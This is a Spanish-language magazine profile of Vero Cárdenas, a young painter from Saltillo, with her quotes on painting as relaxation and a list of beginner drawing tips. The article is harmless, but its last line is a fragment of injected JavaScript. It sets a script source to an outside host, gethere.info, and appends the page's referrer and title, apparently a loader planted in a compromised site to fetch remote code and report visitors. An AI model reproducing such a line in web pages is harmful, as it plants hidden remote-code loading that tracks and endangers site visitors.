Vero Cárdenas. ‘Cuando pinto soy única’

 

 

Esta talentosa saltillense es una joven promesa de la pintura en la ciudad. Te invitamos a conocerla

 

Texto: Arian Esquivel  Foto: Luis Castrejón

 

 

El arte viene del alma, el arte sólo puede fluir de nuestro interior, nutrirse de nuestra imaginación y formarse a través de las emociones inesperadas, como diría el propio Siqueiros: “El estilo es lo último, es la última consecuencia del fenómeno plástico y no el principio”.

Un estilo que se adueña de la mente de cientos de jóvenes, uno de ellos: Vero Cárdenas, quien pinta sin detenerse buscando expresar sus ideas y sentimientos. Te invitamos a conocer a esta joven promesa en 360.

 

Pintar me relaja

En el arte se vale todo, no hay dibujos bonitos o feos, la pintura es capaz de transmitir sentimientos y visiones del mundo a través del dibujo y la pintura.

Verónica Cárdenas asegura que al pintar podemos apagar nuestro cerebro, desconectarlo o relajarlo. Colorear nos ayuda a evadirnos de este mundo, a estimular nuestra creatividad, a conectar con nosotros mismos y a dar rienda suelta a nuestra fantasía.

 

La madre de Vero notó esta cualidad en su hija desde pequeña, es por eso que sin pensarlo la metió en clases de pintura. Sin pensarlo, lo que en un momento parecía un hobby se transformó en la pasión de su hija.

“Mi mamá fue la que me metió a clases de pintura, ella creía en mi talento pero luego se dio cuenta que esto es algo a lo que me puedo dedicar, porque es algo que me apasiona, y además me encanta y relaja mucho”, explicó Verónica Cárdenas.

Según explican los investigadores, cuando nos concentramos en pintar, ponemos en marcha la coordinación entre el ojo y la mano, lo cual ocasiona que activemos ciertas zonas cerebrales que favorecen la inhibición del sistema límbico (nuestro centinela emocional), de tal manera que nos liberamos de las preocupaciones y de la ansiedad. Estos aspectos fueron los que Vero notó; tomar un pincel y llenar un lienzo blanco siempre la hace sentir única, libre, relajada, contenta.

“Me encanta pintar porque puedes plasmar lo que tu quieras y lo que te imagines, y lo que más me gusta que es un espacio donde tu te puedes relajarte, es como ir a otro mundo”, confesó la joven pintora.

Vero Cárdenas quien actualmente tiene 18 años, adecuó un cuarto en casa únicamente para ella, en el cual pasa horas dibujando, ahí el tiempo pasa volando y necesidades tan básicas como la comida se lo olvidad al tener entre sus manos un pincel.

“Tengo un cuarto que especial para mi, ahí esta todo mi trabajo. Al entrar el día se pasa volando. Me pongo mi mandil y mi ropa para pintar, un poco de música y las horas se desvanecen, no como, ni ceno, el tiempo pasa sin darme cuenta”, comentó Cárdenas.

Vero aún sigue experimentando y buscando su propio estilo; mientras tanto no deja de pintar retratos o paisajes, llenar de color cuanto mira, cómo ella misma menciona, su misión es ponerle color a la vida.

“Siempre me dedico en pensar lo que voy a hacer, en la armonía, pinto lo que siento y lo que quiero, me gusta ponerle color a todas las cosas”.

Cárdenas sabe que el camino a convertirse en una artista profesional es difícil, pero sus propias obras le han dado el visto bueno a su sueño.

“Lo ultimo que pinté fue un gallo de muchos colores, pero lo que me encantó fue una réplica que hice de Pablo Picasso de una imagen de la espalda de una mujer desnuda, ahí me di cuenta que esto es lo que me gusta hacer y apasiona”, finalizó Verónica Cárdenas.

 

El arte, esencial en la vida

Los jóvenes son los actores principales en una sociedad y por tanto debemos tratar de cultivar en ellos valores sólidos y buenas costumbres que les permitan construir una clara identidad de quienes son y qué pueden aportar a la sociedad.

El arte es el  medio a través del cual los jóvenes van a poder desarrollarse, encontrarse a sí mismos y sensibilizarlos con el mundo; tal como lo hace Verónica Cárdenas.

“El arte es muy importante en la vida de todas las personas, porque es algo que te hace volar de tu mundo y dejar los problemas a un lado, y no quiero decir que te esconde pero si te aísla un poco, te permite ver una realidad e interpretarla”, dijo Cárdenas.

Los consejos

Para pintar solo se requieren un par de cosas, ganas y pasión, a continuación te enlistamos una serie de consejos que si deseas comenzar a pintar pueden ayudarte mucho.

1.-Si no te sientes seguro a la hora de dibujar, dibuja en hoja del tamaño del lienzo para que puedas hacer todas las correcciones necesarias y cuando este listo lo traspasas al lienzo.

2,-Dibujar algo con las proporciones correctas. Proporción, es simplemente el tamaño de un objeto en relación con otros objetos a su alrededor. La forma más fácil de conseguir una buena proporción es aprender a medir. La mejor unidad de medida en el dibujo de una persona es la cabeza. No se trata de la mayor parte del cuerpo, ni es el más pequeño, por lo que es una parte muy útil para comparar con otras partes del cuerpo. Por ejemplo, algunos artistas sostienen un lápiz o su pincel como una unidad de medida, así pueden manejar y estimar la distancia de esa manera, mientras que otros utilizan visores con marcas en los lados.

3.- Prueba mirando el dibujo a través de un espejo te aseguramos descubrirás detalles y errores que posiblemente no los has visto a simple vista.

4.- Es recomendable empezar el dibujo en el lienzo con carbón vegetal, es muy suave y con pasar un trapo suavemente sale sin necesidad de utilizar un borrador.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;